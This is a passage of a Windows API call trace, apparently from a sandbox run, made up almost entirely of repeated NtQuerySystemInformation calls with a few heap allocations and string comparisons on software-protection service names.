ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de90, Length=0x28, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de90, Length=0x28, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df00, Length=0x28, ResultLength=0x0) [0238.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e060, Length=0x38, ResultLength=0x0) [0238.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df80, Length=0x28, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df80, Length=0x28, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e060, Length=0x38, ResultLength=0x0) [0238.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x20, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de60, Length=0x20, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de60, Length=0x20, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de60, Length=0x20, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e060, Length=0x38, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x20, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de70, Length=0x20, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de70, Length=0x20, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e130, Length=0x50, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e0b0, Length=0x28, ResultLength=0x0) [0238.308] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e130, Length=0x50, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e130, Length=0x50, ResultLength=0x0) [0238.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e130, Length=0x50, ResultLength=0x0) [0238.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e060, Length=0x38, ResultLength=0x0) [0238.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de90, Length=0x28, ResultLength=0x0) [0238.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de90, Length=0x28, ResultLength=0x0) [0238.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de90, Length=0x28, ResultLength=0x0) [0238.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df00, Length=0x28, ResultLength=0x0) [0238.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e060, Length=0x38, ResultLength=0x0) [0238.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df80, Length=0x28, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7df80, Length=0x28, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e060, Length=0x38, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x20, ResultLength=0x0) [0238.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de60, Length=0x20, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de60, Length=0x20, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de60, Length=0x20, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e060, Length=0x38, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7dee0, Length=0x20, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de70, Length=0x20, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7de70, Length=0x20, ResultLength=0x0) [0238.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.320] GetProcessHeap () returned 0x2026c630000 [0238.320] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65b010 [0238.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.343] GetProcessHeap () returned 0x2026c630000 [0238.343] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d65b040 [0238.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0238.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0238.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0238.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0238.369] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0238.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0238.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0238.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0238.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) 